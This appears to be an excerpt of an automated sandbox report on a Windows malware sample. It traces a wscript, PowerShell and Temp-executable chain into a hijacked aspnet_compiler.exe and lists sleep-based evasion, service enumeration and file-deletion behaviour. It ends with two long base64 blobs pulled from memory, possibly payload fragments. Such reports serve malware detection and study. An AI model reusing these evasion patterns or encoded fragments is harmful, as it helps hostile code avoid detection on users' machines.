                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040E54F Sleep,ExitProcess,11_2_0040E54F
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 48B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5F10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 7040000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 50F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 6770000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 68A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 78A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,11_2_004198C2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1895Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3235Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 6134Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 3330Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 4.9 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 3054 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760Thread sleep count: 241 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7956Thread sleep count: 248 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7956Thread sleep time: -124000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7960Thread sleep count: 6134 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7960Thread sleep time: -18402000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7960Thread sleep count: 3330 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 7960Thread sleep time: -9990000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040B335
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,11_2_0041B42F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040B53A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,11_2_004089A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406AC2 FindFirstFileW,FindNextFileW,11_2_00406AC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,11_2_00407A8C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00418C69
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,11_2_00408DA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00406F06
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: wscript.exe, 00000003.00000003.1967133637.000001AD76ED8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1970760292.000001AD76EDD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1968292797.000001AD76EDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg-
                  Source: aspnet_compiler.exe, 0000000A.00000002.2994176389.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                  Source: wscript.exe, 00000003.00000003.1821033742.000001AD797A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
                  Source: wscript.exe, 00000003.00000003.1968533316.000001AD796A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 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
